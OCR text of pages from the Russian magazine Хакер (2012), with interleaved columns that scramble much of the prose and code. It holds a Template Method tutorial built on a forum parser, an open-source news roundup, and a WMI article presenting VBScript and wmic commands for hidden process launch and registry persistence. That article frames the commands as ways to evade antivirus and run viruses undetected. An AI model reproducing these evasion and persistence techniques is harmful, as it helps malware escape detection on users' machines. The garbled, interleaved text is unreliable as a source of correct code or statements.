Алгоритмы – это, пожалуй, самое важное структура построения интерфейса схожа. На одной странице
в мире кодинга. Любая программа реализует отображается строго заданное количество топиков – скажем,
тридцать. Если тем в разделе форума больше, чем тридцать, то
какую-то последовательность действий пользователю показывается навигационный элемент, — напри-
и в большинстве случаев не одну. В ООП мер, ссылка на следующую страницу или пронумерованный спи-
сок этих страниц. Таким образом, наш парсер должен не только
алгоритмы имеют такую же значимость, как проходить по первой странице, но и уметь бегать по соседним,
и в любом другом виде кодинга, поэтому гуру также содержащим нужную нам информацию.
Вырисовывается вполне конкретный алгоритм действий:
объектов и классов придумали специальный парсер получает адрес страницы, скачивает ее, выдирает
паттерн, который позволяет сделать нужные топики/объявления, ищет адрес следующей страни-
цы и если его находит, то начинает все сначала. В противном
использование алгоритмов более легким, случае, если мы не нашли ссылку на следующую страницу,
понятным и гибким. парсер заканчивает свою работу. В коде все это будет выглядеть

096 ХАКЕР 04 /159/ 2012

 Паттерн «Шаблонный метод»

примерно так:

Алгоритм работы парсера

class Parser
{
// ..
public:
void parsePage(string url)
{
while (url != "")
{
// получаем нужные данные со страницы
getTopicText();

// ищем ссылку на следующую страницу

url = getNextUrl();
}
}
private:
void getTopicText()
{
// ...
}
string getNextUrl()
{
// ...
}
Диаграмма классов паттерна «Шаблонный метод»
}

У нас есть класс Parser, который имеет основной метод void getDataOnPage()
parsePage(). Этот метод будут вызывать клиенты парсера. {
Сам parsePage() реализует алгоритм, описанный выше. Для // ...
удобства восприятия мы разбили код метода на функции, такие }
как getNextUrl() и getTopicText(). Некоторые могут сказать, что string getNextUrl()
лишние вызовы замедляют работу программы, но, во-первых, {
это всего лишь псевдокод (грубо говоря, блок-схема буквами), // ...
а во-вторых, такое разбиение нам пригодится в будущем. }
}
ПАРСИМ НЕСКОЛЬКО САЙТОВ
Наш парсер работает, и все вроде хорошо, но мы не учли одну Как видишь, у нас есть все тот же метод parsePage(), который
маленькую деталь — сайт для сбора информации у нас не один, выполняет основную работу. Так как мы знаем, что такое на-
их несколько. Это нас, правда, не сильно расстроило, и мы при- следование, полиморфизм и прочее, то решаем все это круто
нялись ваять еще один класс. оптимизировать, создав общего родителя для двух классов пар-
Так как алгоритм, описанный нами ранее, остался прежним, серов. Теперь вся наша конструкция выглядит примерно так:
а изменились лишь детали реализации, — например, получение
ссылки на следующую страницу, — то код нашего нового класса Иерархия классов парсеров
будет очень похож на тот, что был в предыдущем. class BaseParser
{
Парсер для еще одного сайта // ..
class ParserSite2 public:
{ virtual void parsePage(string url) = 0;
// .. }
public:
void parsePage(string url) class ParserSite1: public BaseParser
{ {
while (url != "") public:
{ void parsePage(string url)
// получаем нужные данные со страницы {
getDataOnPage(); while (url != "")
{
// ищем ссылку на следующую страницу // получаем нужные данные со страницы
url = getNextUrl(); getTopicText();
}
} // ищем ссылку на следующую страницу
url = getNextUrl();
private: }
// метод по назначению идентичен }
Parser::getTopicText private:

ХАКЕР 04 /159/ 2012 097

КОДИНГ

Мы сделали parsePage базовым методом, но переложили

реализацию на потомков, пометив его как абстрактный. Такой
ход, конечно, внес некоторый порядок в нашу программу, но
осталась проблема дублирования кода. Реализация процесса
сбора информации очень похожа, а учитывая то, что мы ввели
такие методы как getNextUrl() и тому подобные, мы получаем
вообще идентичный набор символов в теле parsePage().

ПАТТЕРН «ШАБЛОННЫЙ МЕТОД»

Паттерн «Шаблонный метод» призван икапсулировать в себе
выполнение некоторого алгоритма. Мы уже частично реализо-
вали его, выделив базовый класс для наших парсеров. Следую-
щим шагом будет непосредственно инкапсуляция. Для этого
мы перенесем код метода parsePage() из дочерних классов
ParserSite1 и ParserSite2 в родительский BaseParser. Благода-
ря тому, что мы уже выделили в отдельные функции некоторые
части алгоритма (такие как получение текста объявления или
поиск ссылки на следующую страницу форума), то мы немного
упростили процесс применения паттерна. Если бы изначально
весь код parsePage был построен без вызова дополнительных
методов, то нам все равно пришлось бы их писать.

Паттерн «Шаблонный метод»

class BaseParser
{
// ..
public:
void parsePage(string url)
{
Пример кода паттерна «Шаблонный метод»
while (url != "")
{
void getTopicText() // получаем нужные данные со страницы
{ getTopicText();
// ..
} // ищем ссылку на следующую страницу
string getNextUrl() url = getNextUrl();
{ }
// .. }
} protected:
} // эти части алгоритма должны определить наследники
virtual void getTopicText() = 0;
class ParserSite2: public BaseParser virtual string getNextUrl() = 0;
{ }
public:
void parsePage(string url) class ParserSite1: public BaseParser
{ {
while (url != "") public:
{ // Мы не должны изменять метод parsePage,
// получаем нужные данные со страницы // так как базовый класс предоставил нам специальные
getTopicText(); // функции, которые позволяют реализовать
// специфичныечасти алгоритма
// ищем ссылку на следующую страницу //void parsePage(string url);
url = getNextUrl(); protected:
} // эти два метода переопределяются в субклассе
} // для реализации специфичного для данного парсера
private: кода
void getTopicText() void getTopicText()
{ {
// .. // ..
} }
string getNextUrl() string getNextUrl()
{ {
// .. // ..
} }
} }

098 ХАКЕР 04 /159/ 2012

 Паттерн «Шаблонный метод»

class ParserSite2: public BaseParser

{ остановится преждевременно. Метод должен определяться
// структура класса идентична структуре ParserSite1 как виртуальный, чтобы в функции алгоритма базового класса
} вызывались методы, переопределяемые в дочерних (если они
переопределяются). По умолчанию перехватчик возвращает
Если взглянуть на код иерархии классов парсеров, к которому при- False, тем самым никак не влияя на количество итераций. Но
менен наш паттерн, то можно увидеть, что в базовый класс также вы- потомки BaseParser могут переопределить код перехватчика
несены методы getNextUrl() и getTopicText(). По умолчанию они имеют и тем самым повлиять на ход алгоритма.
пустую реализацию, поэтому дочерние классы должны определить,
какой код там будет. Но в общем случае «Шаблонный метод» допуска- Контроль количества обработанных страниц
ет некий базовый функционал в подобных функциях, таким образом class ParserSite1: public BaseParser
конкретные реализации парсера могут воспользоваться уже готовым {
кодом. // ..
Теперь контроль за исполнением алгоритма сосредоточен в ру-
ках одного единственного класса — BaseParser. Его наследники protected:
мог у т лишь менять детали реализации этого алгоритма, которые // используем перехватчик по умолчанию,
строго определены в базовом классе. Что нам это дает? Ну, пред- // то есть не вмешиваемся в работу цикла
ставим, что парсить нам надо не один-два сайта, а сразу сотню. И в // bool stopHook();
какой-то момент мы решаем заменить итерационный алгоритм на }
рекурсивный. С пат терном «Шаблонный метод» нам достаточно из-
менить код всего в одном месте — BaseParser::parsePage(). Если бы class ParserSite2: public BaseParser
ответственность за реализацию основной последовательности дей- {
ствий лежала на отдельных классах-парсерах, то нам бы пришлось
перелопатить тонны исходников, преж де чем получим желаемый // ..
результат.
private:
ПЕРЕХВАТЧИКИ int count;
Жесткий контроль алгоритма — это хорошо, но что если нам нужно
пространство для маневра? Если в последовательности действий protected:
предусмотрено некоторое ветвление, на которое влияют детали реа- // переопределяем перехватчик
лизации, то нам потребуются методы-перехватчики (хуки). bool stopHook()
Допустим, класс ParserSite1 должен просматривать все страницы {
форума, а вот ParserSite2 всего-навсего первые три. Получается, что
каждая конкретная реализация парсера влияет на одно из фундамен- if (count > 3)
тальных свойств алгоритма — работу цикла. Очевидно, что нам надо return true;
как-то контролировать количество итераций, чтобы ParserSite2 оста- else
новился в нужный момент. Но невозможность изменения поведения return false;
parsePage не дает нам это сделать. }
Хуки же позволяют влиять на ход алгоритма и при этом сохранять
контроль над ним в базовом классе. Немного изменив код метода // тут увеличиваем счетчик отпарсенных страниц
parsePage() мы позволим потомкам преждевременно останавливать void getTopicText()
цикл while. Давай взглянем на код. {
// ...
Перехватчик в «Шаблонном методе» count++;
class BaseParser }
{ }
// ..
public: Мы видим, что ParseSite1 не перегружает хук, и parsePage
void parsePage(string url) пользуется дефолтным вариантом. А вот ParseSite2 ведет
{ подсчет количества обработанных страниц, и когда их число
while (url != "") достигает трех, перехватчик останавливает цикл.
{ Если бы в паттерне «Шаблонный метод» не было хуков, нам
пришлось бы переписывать реализацию parsePage для каждого
// с помощью хука можно досрочно завершить цикл отдельного класса парсера, вследствие чего пропал бы прак-
if (stopHook()) тически весь смысл его использования, так как мы потеряли бы
break; контроль над алгоритмом.

// ... ЗАКЛЮЧЕНИЕ
} На практике паттерн «Шаблонный метод» имеет множество
} вариаций. Многие из программистов сами того не зная реализо-
вывали этот паттерн в том или ином виде. Но основной принцип
protected: остается неизменным: «Шаблонный метод» определяет «ске-
// перехватчик лет» алгоритма в методе, оставляя определение реализации
virtual bool stopHook() {return false;}; некоторых шагов субклассам. Субклассы же, в свою очередь,
// .. могут переопределять некоторые части алгоритма без измене-
} ния его структуры. z
От метода stopHook() зависит, будет ли цикл работать дальше или

ХАКЕР 04 /159/ 2012 099

КОДИНГ Александр Эккерт ([email protected])

WMI:
обход
защит
НЕОЖИДАННЫЙ ВЗГЛЯД
НА ПРИВЫЧНЫЕ ВЕЩИ

Как это часто бывает, самое интересное оговорим о Windows Management Instrumentation (WMI),
и увлекательное просто валяется П но с несколько непривычной точки зрения. Собственно, ][
уже писал на эту тему — как можно приспособить средства
под ногами. Сегодня мы рассмотрим WMI для своих нужд (xakep.ru/magazine/xa/118/030/1.asp). Будем
возможность обхода проактивных защит при считать эту статью продолжением написанного ранее.

помощи средств, входящих в стандартную ЛОМАЯ БРОНЬ ПРОАКТИВНЫХ ЗАЩИТ

комплектацию ОС Windows. Насколько я знаю, скрипты WMI использует в своей работе
лишь один человек из десяти. И это в лучшем случае. А ведь
зря! Это удобное и мощное средство. Ну и что т у т такого
интересного, — скажешь ты, — По большей части WMI пред-
назначен для сбора информации о компьютере и выполнения
нехитрых приемов администрирования. Я бы с тобой согла-
сился, если бы не два «но», которые наглядно демонстрируют,
как можно использовать всю мощь WMI для создания кумуля-
тивных зарядов, пробивающих бронь антивирусов и проактив-
ных защит.
Первое — это возможность создания нужного тебе процесса.
Каким образом?

Const SW_NORMAL = 1
Const SW_HIDE = 0
strComputer = "."
strCommand = "notepad.exe"

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")

Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = SW_NORMAL

Set objProcess = objWMIService.Get("Win32_Process")

intReturn = objProcess.Create _
Невидимый Notepad (strCommand, Null, objConfig, intProcessID)

100 ХАКЕР 04 /159/ 2012

 WMI: обход защит

псевдонимов может быть выведен с помощью набора команды

«WMIC /?». Имеющиеся в нашем распоряжении псевдонимы пред-
ставляют основной круг задач администраторов и информацию,
в которой они могут быть заинтересованы. Однако это еще не
все, что можно сделать, используя WMIC. WMIC могут быть также
использованы для прямых запросов к WMI-схеме. Это даст тебе
доступ ко всем имеющимся классам, а не только к тем, которые
предоставляются с помощью псевдонимов. Например, чтобы
создать процесс, достаточно выполнить в открывшейся командной
строке process call create "calc.exe". Из известных аверов на такое
создание процесса никто даже ухом не повел. А что, если таким об-
разом запустить на исполнение вирус? Ну и последний булыжник
в огород красивых «решений по 100% безопасности вашего ком-
пьютера», — смотрим, как легко «брюки превращаются в шорты»:
Беспалевная запись в реестр
wmic /NameSpace:\\root\default Class StdRegProv Call Cre-
ateKey hDefKey="&H80000002" sSubKeyName="SOFTWARE\\Micro-
Обрати внимание на параметр ShowWindow: если хочешь soft\\Windows\\CurrentVersion\\fuck_avers"
скрыть окно твоего приложения, то используй параметр SW_
HIDE = 0. На скрине ты можешь видеть, как в списке процессов Запусти этот код на выполнение, посмотри на результат, а потом
taskmanager’а болтается запущенный таким образом «блокнот», — на «лучшее решение для защиты», которое обеспечивает так
однако на панели задач ничего нет! Второе — это запись в реестр! называемую «безопасность» твоего компьютера, поплачь и иди
Да-да, используя vbs-скрипты, можно легко писать в реестр! выкидывать его на помойку. Если запуск vb-скриптов аверами
худо-бедно палится (хотя и далеко не всеми), то в данном случае ни
const HKEY_LOCAL_MACHINE = &H80000002 один из десяти протестированных мной антивирусов (а тестировал
strComputer = "." я только самые популярные) не смог отловить такую хитропопую
Set objReg=GetObject( _ запись в чувствительные ветки реестра. По-моему, уже не смешно.
"winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv") ЗАКЛЮЧЕНИЕ
Итак, подведем итоги. Заметь, я не рассматриваю в данной статье
strKeyPath = "SYSTEM\\CurrentControlSet\\Services\\MyService" какие-то уязвимости операционной системы, позволяющие вы-
objReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath полнить зловредный код на целевой машине, которые являются
strValueName = "Descrition" недоглядом разработчиков Windows, — их и так хватает. Сегодня
strValue = "New Virus Service" мы увидели, что можно запросто, используя только законные сред-
objReg.SetStringValue _ ства операционной системы, выбираться из тех клеток, которые
HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue ставят «честным хакерам» разработчики антивирусов и проактив-
ных защит. z
В данном случае ветка реестра HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\ используется для старта
системных служб и сервисов Windows, в том числе загрузки драй-
веров. Правда, тут есть одно ограничение, о котором ты, думаю,
слышал. Данный метод пройдет для Windows XP, но не для «се- DYNAMICWRAPPERX
мерки», — в Win7 писать в ветку HKEY_LOCAL_MACHINE не дадут.
Однако есть возможность использования аналогичного скрипта
для записи в HKEY_CURRENT_USER. Отмечу сразу, что указанные В контексте данной статьи не могу не упомянуть о чуде под
способы пробивают не все, но большинство антивирусов. К приме- названием DynamicWrapperX (script-coding.com/dynwrapx.html).
ру, описанные ниже техники тестировались мной около года назад, Она не имеет прямого отношения к WMI, но мне кажется, что
и из десяти антивирусов со стандартными настройками безопас- тебе нужно о ней знать. Это ActiveX-компонент (СОМ-сервер),
ности лишь один заблокировал создание процесса и запись в чув- который предоставляет возможность вызывать из яваскриптов
ствительные ветки реестра (в частности, HKEY_LOCAL_MACHINE\ и VB-скриптов функции, экспортируемые dll-библиотеками, —
SOFTWARE\Microsoft\Windows\CurrentVersion\Run), заложенные в частности, функции Windows API.
в vbs-скрипте. Все остальные — как бы сказать помягче — про- Вызвать напрямую, скажем, функцию CreateWindowEx из vb —
шляпили выполнение потенциально опасного кода. нельзя, интерфейс под это не заточен. И вот автор DynamicWrapperX
— замечательный программист Юрий Попов — озадачился этой
ТЕ ЖЕ ЯЙЦА, ВИД СБОКУ проблемой и успешно ее решил.
Для исполнения трюков необязательно использовать VB- и Java- С помощью процедуры регистрации COM-серверов в системе:
скрипты. Существует вполне адекватная командная строка, "regsvr32.exe dynwrapx.dll", устанавливаем DynamicWrapperX
которая пустит нас в оболочку WMI (WMI command-line). Для этого в систему и получаем крайне очаровательную возможность
нужно выполнить команду «wmic». Суть командной строки WMI — вызывать WinAPI-функции из VB/Java-скриптов!
выполнение того же скрипта, как если бы он был оформлен в виде Делается это примерно так:
VBS- или JS-кода.
Командная строка WMI включает серию «предварительно за- Set DX = CreateObject("DynamicWrapperX")
готовленных» WMI-запросов, известных как псевдонимы. Ты смо- DX.Register "kernel32", "Beep", "i=uu"
жешь просмотреть содержание любого псевдонима, просто набрав DX.Beep 800, 1000
в командной строке «WMIС», а следом — имя этого псевдонима.
Например «WMIC QFE» выведет список всех «заплаток» и пакетов Как можно ее применить — решать тебе, но согласись, что довольно
обновлений, установленных на компьютере. Полный список всех удобная штука!

ХАКЕР 04 /159/ 2012 101

UNIXOID Юрий «Adept» Видинеев ([email protected])

Новые
времена
требуют
перемен
Мир OpenSource привлекает
своей динамикой.
В нем постоянно что-то
происходит: системы,
концепции, стандарты
сменяют друг друга
с бешеной скоростью,
причем с каждым годом
темп только увеличивается.
Об основных актуальных
направлениях развития
свободных решений мы
сегодня и поговорим.

ОПИСАНИЕ ТЕХНОЛОГИЙ
БЛИЖАЙШЕГО БУДУЩЕГО,
ИДУЩИХ НА СМЕНУ
ТЕХНОЛОГИЯМ ДНЯ
ВЧЕРАШНЕГО Однооконный режим в Gimp 2.8

102 ХАКЕР 04 /159/ 2012

 Новые времена требуют перемен

lsmod — теперь просто ссылка на kmod

X: REVOLUTION клиент (оверхед при этом обещает быть не Journal, который появился в релизе systemd
Wayland — это протокол и его демонстрацион- очень большим). 38. Модуль предоставляет функциональность,
ная реализация (на C, объем кода составляет Не то чтобы Wayland совсем новый проект аналогичную syslog, но с некоторыми особен-
менее 10 000 строк, лицензия — MIT), идущий (разработка ведется с 2008 года), но велика ностями. Для начала разработчики отмечают
на смену ни много ни мало X-серверу! Основ- вероятность, что через пару-тройку лет он ока- у старичка syslog, которому уже около тридца-
ная причина — X устарел: его архитектура на жется во всех десктопных и мобильных линук- ти лет, целый список недостатков.
сегодняшний день неактуальна, а код сложно сах. Благо, первый стабильный релиз 1.0 уже не • При приеме сообщений в syslog отсутствует
поддерживать. за горами —возможно даже, что он увидит свет какая-либо аутентификация отправителя:
Главная особенность Wayland — объеди- до момента выхода данного номера в печать. если процесс представится, что он mysql на
нение в один элемент (Wayland Compositor порту 10000, то так и будет записано.
или Wayland Server) того, что в архитектуре X KMOD: EVOLUTION • Отсутствует утвержденный формат, в кото-
было, собственно, X-сервером, композитором В конце прошлого года несколько известных ром логируются данные. Это сильно затруд-
и менеджером окон. Wayland Compositor имеет разработчиков из RedHat написали открытое няет парсинг логов и вынуждает изменять
пока единственную реализацию — Weston, письмо, в котором перечислили возможности, скрипты парсинга при любых изменениях
которую создают разработчики протокола которые они хотели бы реализовать в ядре вывода в лог в программах.
Wayland. В недалеком будущем ожидается под- Linux и низкоуровневых утилитах, если бы у них • В записях отсутствует информация о часо-
держка Wayland у Compiz и Kwin. При этом все было на это время: goo.gl/RWgbf. Прошло не- вом поясе.
операции по рендерингу окна будет выполнять сколько месяцев, и одна из «хотелок» увидела • Syslog — лишь одна из многих систем жур-
Wayland Client (то есть само приложение). Это свет под именем kmod. Представляет собой налирования, работающих в Linux: есть еще
позволит избавиться от ошибок рендеринга замену module-init-tools (пакета, содержащего utmp/wtmp/btmp, lastlog, логи ядра, а также
изображений, возникающих в X Server, а также утилиты для управления модулями ядра: lsmod, логи всевозможных приложений. Когда логи
уменьшить время отрисовки изменений. Еще modprobe, rmmod и другие), основное преиму- так раскиданы по системе, сложно искать
одним плюсом является возможность работы от щество — использование библиотеки libkmod, связи между событиями в них.
имени непривилегированного пользователя. которая также может использоваться в любых • Так как в логах отсутствует какая-либо
Так как Wayland завязан на такие штуки, приложениях (лицензия — LGPLv2 и старше). индексация, их чтение очень неэффективно
как Direct Rendering (DRI), KMS (Kernel Mode Первое подобное приложение — udev. Раньше (при поиске приходится перебирать все
Setting) и GEM (Graphics Execution Manager), при загрузке несколько сотен раз вызывалась строчки).
то бегать он может только поверх Linux и пока внешняя утилита modprobe (и при этом не всег- • Сетевой протокол syslog прост в реализа-
только со свободными драйверами для видео- да успешно — могло оказаться, что модуль уже ции, но очень ограничен: в частности, никак
карт Intel, Radeon и Nouveau. загружен), а использование libkmod помогло не гарантирует доставку.
Одной из часто критикуемых вещей в но- существенно снизить накладные расходы на • Из логов легко удалять данные, чем часто
вом протоколе является отсутствие сетевой чтение файла конфигурации и построение пользуются при взломе для заметания сле-
подсистемы (наподобие той, что с незапамят- списка доступных модулей при каждом вызове. дов.
ных времен была в X11). Эта критика не совсем Уменьшение времени загрузки при переходе • Ограниченные средства контроля доступа:
оправдана — просто сам протокол Wayland на новый udev заметно даже на глаз. Кроме пользователь или имеет доступ ко всем за-
не включает в себя описания реализации udev, с kmod возможно скоро научится работать писям в логе, или не имеет их вообще.
сетевой подсистемы, но это не мешает реа- systemd. Arch Linux, как обычно, впереди пла- • Практически полностью отсутствует воз-
лизовать сетевое взаимодействие на уровне неты всей и с января этого года уже использует можность сохранения метаданных записи.
композитора. kmod версии 4. В экспериментальном репозито- • Ротация логов тоже не совершенна: она не
Поддержка (правда, пока весьма ограни- рии Debian также присутствует kmod версии 3. учитывает оставшееся на разделе место и не
ченная) Wayland уже есть во многих проектах: умеет динамически менять интервалы, что
Qt, GTK, EFL (Enlightenment Foundation Library), SYSLOG: DESTRUCTION позволяет проводить DoS-атаки.
Clutter, SDL. Приложения, не использующие Systemd — система инициализации (замена • Компрессия поддерживается только после
ни один из этих тулкитов (а таких не очень для SysVinit и Upstart), которая используется ротации.
много),тоже поддерживаются — достаточно во все большем количестве дистрибутивов. Но • Невозможность сохранения бинарных дан-
просто запустить X.Org-сервер как Wayland- речь пойдет не о ней, а о модуле под названием ных типа coredump.

ХАКЕР 04 /159/ 2012 103

UNIXOID

• Отсутствие возможности журналирования

событий на этапе ранней загрузки или перед
самым выключением ОС.

Journal также имеет особенности:

• Все данные хранятся в формате «ключ-
значение». Ключи и значения могут быть
произвольные, значениями могут быть даже
Больше никаких SUID
бинарные данные.
• Записи проиндексированы, что значитель-
но увеличивает скорость поиска. Заманчиво, конечно. Если бы не одно «но» • SUID/SGID-биты будут постепенно за-
• Компрессия будет использована и для лога, — данные будут храниться в бинарном виде, менены на capabilities — механизм ядра,
в который в данный момент идет запись. то есть никаких тебе tail, less и grep напрямую. с помощью которого можно гибко управлять
• Для каждой записи будет создан ее хэш, Перевесят ли все плюсы этот минус — покажет привилегиями. Многие уязвимости недавне-
который образуется не только из самой время. го прошлого были связаны с использовани-
записи, но и из хэша предыдущей. Таким ем бинарников с SUID-битом.
образом можно будет по цепочке проверить НОВЫЕ ВРЕМЕНА, • chroot, возможно, уступит место более со-
целостность всего лога (например, на пред- НОВЫЕ СТАНДАРТЫ временному инструменту для запуска подо-
мет удаления записей). Подобный механизм Есть еще пара интересных вещей, которые не зрительного кода и изолированной работы
уже давно успешно применяется в git. представляют из себя чего-то принципиально приложений — libvirt-sandbox. Основанный
• Поддерживается API syslog (с некоторыми нового, а просто изменяют годами устоявшие- на libvirt, при запуске он создает вирту-
расширениями) — не придется переписы- ся моменты. альную машину, в качестве корневой ФС
вать приложения. • Каталоги /bin,/sbin,/lib(/lib64) будут совме- которой используется корень хост-системы,
• Возможность гибко ограничить количество щены с соответствующими каталогами в /usr. смонтированный в режиме read-only. Дебют
записей в лог за одну секунду. Это ограни- По крайней мере в Fedora (а это значит, что инструмента должен произойти в Fedora 17.
чение может меняться по заранее заданным впоследствии с большой долей вероятности
правилам в зависимости от количества и в большинстве RPM-дистрибутивов). Для В общем-то, ничего удивительного, что
свободного места на разделе. обеспечения обратной совместимости на большинство перечисленных радикальных
• Ротация будет осуществляться автомати- старом месте будут симлинки. Таким образом перемен происходит в Fedora — ее разработ-
чески, без применения сторонних утилит. все неизменяемые части системы теперь бу- чики любят ломать устои: взять хотя бы недав-
При поиске активный и архивные логи будут дут лежать в одном месте, что позволит проще нее переименование сетевух в зависимости
выглядеть как единое целое. смонтировать их в read-only, проще создавать от их расположения на материнской плате.
• Может объединить в себе логи всех при- виртуальные окружения и снапшоты файло- В Canonical же больше любят эксперименты
ложений, в том числе utmp/wtmp, журналы вой системы. В качестве успешного примера с интерфейсами. Очередная инновация —
загрузки и другие. подобной иерархии приводят Solaris 11. Ubuntu HUD (Head-Up Display): система меню,

НАВИСШАЯ УГРОЗА

UEFI (Unified Extensible Firmware Interface) — грядущая замена уже предустановленной. Да и запустить самостоятельно собранное ядро
порядком устаревшему BIOS, которая представляет из себя скорее уже не получится (привет пользователям Gentoo), — точнее, получится,
мини-ОС со своими драйверами, сетевым стеком, интерфейсом но ядро надо будет подписать собственным ключом, а его открытую
с поддержкой мыши, локализации и многим другим. Плюсов от часть как-то залить в хранилище ключей UEFI. Red Hat, Canonical
внедрения UEFI много, начиная с (как ни странно) возросшей скорости и Linux Foundation отреагировали на это нововведение составлением
загрузки и заканчивая нэйтивной поддержкой нового формата своих рекомендаций к конечной реализации, а FSF — петицией
разбиения дисков GPT (не имеющего ограничений MBR). Но и минусов к производителям оборудования, в которой secure boot называется
у UEFI тоже предостаточно. Основной на сегодняшний день – это баги. restricted boot (в случае некорректной реализации).
Размер дерева исходников UEFI занимает около 35 Мб (для сравнения, Кроме проблем, связанных с ключами, есть еще проблема
Linux без драйверов весит 30 Мб), спецификация в текстовом виде с загрузчиком, — самый популярный на сегодняшний день Grub2
— больше 2 200 страниц. И весь этот огромный объем кода еще не распространяется по GPLv3, в которой есть пункт против тивоизации,
достаточно тщательно оттестирован — баги всплывают достаточно требующий публиковать ключ в случае подписывания бинарника.
часто. Предыдущая версия — Grub Legacy — в основном распространяется под
Новая неоднозначная фича UEFI, которая войдет в спецификацию GPLv2, но некоторые вспомогательные скрипты — под GPLv3.
версии 2.3.1, — secure boot. Если не вдаваться в подробности, то Матплаты с UEFI и поддержкой secure boot могут появиться в продаже
технологию можно описать следующим образом: весь код (точнее, уже в этом году — возможно, скоро придется учитывать этот аспект
его SHA-256 хэш), работающий с железом напрямую (драйвера, ядро, при выборе железа. Проблема становится еще более реальной, так
загрузчик) должен быть подписан одним из нескольких специальных как в соответствии с требованиями Microsoft для того, чтобы наклеить
ключей (RSA, 2048 бит), открытая часть которых хранится в прошивке на системник/ноут заветную наклейку «Compatible with Windows 8»,
матплаты. Неподписанный (или подписанный не тем ключом) код производитель будет обязан включить опцию «Secure Boot». К тому же
исполняться не будет. Теоретически штука хорошая — эффективное рекомендуется предусмотреть механизм для добавления собственных
средство против малвари, выполняющейся до загрузки ОС (например, ключей. А для систем на базе ARM — еще и обязательно отсутствие
живущей в MBR). Но с другой стороны, в зависимости от реализации кнопки отключения secure boot. Но это не повод для паники: многие
может стать существенно сложнее или (что тоже не исключено) производители (в числе первых — HP и Dell) сообщили, что обеспечат
вовсе невозможно установить альтернативную ОС, отличную от во всех своих новых продуктах возможность отключить secure boot.

104 ХАКЕР 04 /159/ 2012

 Новые времена требуют перемен

в которой чтобы выбрать определенный пункт, НЕ ВЗЛЕТЕЛИ N810 и N900 начиная с 2005 года) и Moblin
нужно написать его название в специальном Новые технологии приходят на смену старым от Intel (разрабатывался с 2007 года). В 2010
поле. Если результатов поиска несколько, постоянно, но не все из них успешны и находят году Nokia и Intel объединили свои усилия для
то выбранный вариант запоминается — так свое место под солнцем. Из примеров по- работы над новым дистрибутивом — Meego,
система подстраивается под конкретного следнего времени мне особенно запомнились который должен был взять все лучшее от
пользователя. В дальнейшем планируется несколько. Maemo и Moblin. Проект обещал быть пер-
интеграция голосового поиска. Не стоит пере- Nftables — замена iptables/netfilter. Плюсы: спективным, заинтересованность выразили
живать, что классические меню уберут, HUD более гибкий и расширяемый ABI, отсут- около тридцати крупных компаний мирового
пока не замена им, а всего лишь приятное ствие дублирования кода (iptables, arptables уровня, управление проектом перешло в руки
дополнение. Описать такую штуку непро- и ebtables — по сути, копии одного и того Linux Foundation. После выпуска смартфона
сто, нужно попробовать самому. Благо, это не же кода), нет необходимости перезагрузки N9 Nokia потеряла интерес к Meego, сосредо-
сложно, — HUD должен быть интегрирован уже всех правил при каждом изменении (из-за точившись на Windows Phone. Чтобы дальше
в Ubuntu 12.04. чего терялось внутреннее состояние и все развивать проект, в конце прошлого года Linux
установленные соединения). Концепция вы- Foundation объединила свои наработки с LiMo
НОВОСТИ ОДНОЙ СТРОКОЙ глядела многообещающе (подробнее можно (Linux Mobile) Foundation под новым именем
Кроме крупных изменений, которые долго посмотреть в ][ #127), но, видимо, этого было Tizen и основной концепцией приложений на
обкатываются, и о которых можно рассказать недостаточно, чтобы перевесить популяр- HTML5. Разработчики Meego, в свою очередь,
много интересного, в ближайшее время нас ность iptables. В Fedora, кстати, для борьбы со организовали форк — Mer. Не исключена
ждут и достаточно ощутимые изменения в раз- сбросом соединений при изменении правил возможность слияния Tizen и Samsung Bada.
личных узких областях. Про нх также хотелось сделали специальную прослойку – firewallD, Возможно, нас опять ждет новое имя для ОС,
бы упомянуть. — которая сохраняет свое состояние. В Fedora у которой уже было больше названий, чем
• IPv6. Давно не диковинка. Более того, благо- 17 этот динамический файрвол, скорее всего, работающих под ее управлением устройств на
даря заканчивающемуся пулу IPv4 и регу- будет использоваться по умолчанию. рынке.
лярно проводимому World IPv6 Day, IPv6 уже Второй пример подобного неудачного
достаточно широко используется. Новость проекта — дистрибутив Linux для мобильных НАДЕЕМСЯ И ВЕРИМ
заключается в реализации IPv6 NAT. Раз- и встраиваемых устройств от Linux Foundation. Во всех этих нововведениях я вижу только по-
личные патчи, реализующие эту функцио- Начиналась эта ОС с двух проектов: Maemo ложительные моменты. Надеюсь, они пройдут
нальность, конечно, существуют достаточно от Nokia (с ней поставлялись прародители испытание временем и не останутся на свалке
давно, но скоро мы увидим это в netfilter из современных планшетов Nokia 770, N800, истории. z
коробки.
• FIOPS (Fair Input/Output Operations Per
Second) — новый планировщик ввода/выво- INFO
да, предназначенный для работы с SSD. По • Тивоизация
принципу действия он похож на популярный — процедура,
реализующая
сейчас CFQ (и заимствует у него часть кода), невозможность
но учитывает такие свойства SSD, как вы- запуска на
сокие скорости чтения и записи, небольшие устройстве
модифицированной
задержки, различную «стоимость» чтения версии прошивки.
и записи, зависимость скорости выполнения Понятие пошло от
медиаплеера TiVo.
запроса от его размера. Наибольший отрыв
от CFQ новый планировщик показывает • utmp/wtmp/
в тестах со смешанным read/write профилем. btmp — файлы
в бинарном формате,
Код еще не протестирован, поэтому, думаю, в которых хранится
раньше, чем в Linux 3.5 мы его вряд ли уви- информация
дим. о текущих
пользователях
• ext4-snapshots — реализация снапшотов в системе, лог
для ext4 (по аналогии с теми, что есть в btrfs). всех входов/
выходов из системы
У снапшотов на уровне ФС довольно много и неудачных
Архитектура Wayland в сравнении с архитектурой X Server
плюсов перед снапшотами на базе LVM: нет попыток
необходимости заранее резервировать авторизации.
место под снапшот, даже при большом • Подробно
количестве снапшотов производительность о systemd можно
не сильно падает. Правда, не факт, что эти прочитать в ][ 148.
патчи попадут в ванильное ядро — патчи
со снапшотами для ext3 (NEXT3) от той же WWW
команды пока туда так и не вошли. • Достаточно
• В Gimp 2.8, релиз которого должен состоять- подробный FAQ по
wayland:
ся в первой половине этого года, наконец-то goo.gl/SNq3E.
появится долгожданный однооконный
интерфейс. • Планы по
разработке X12: goo.
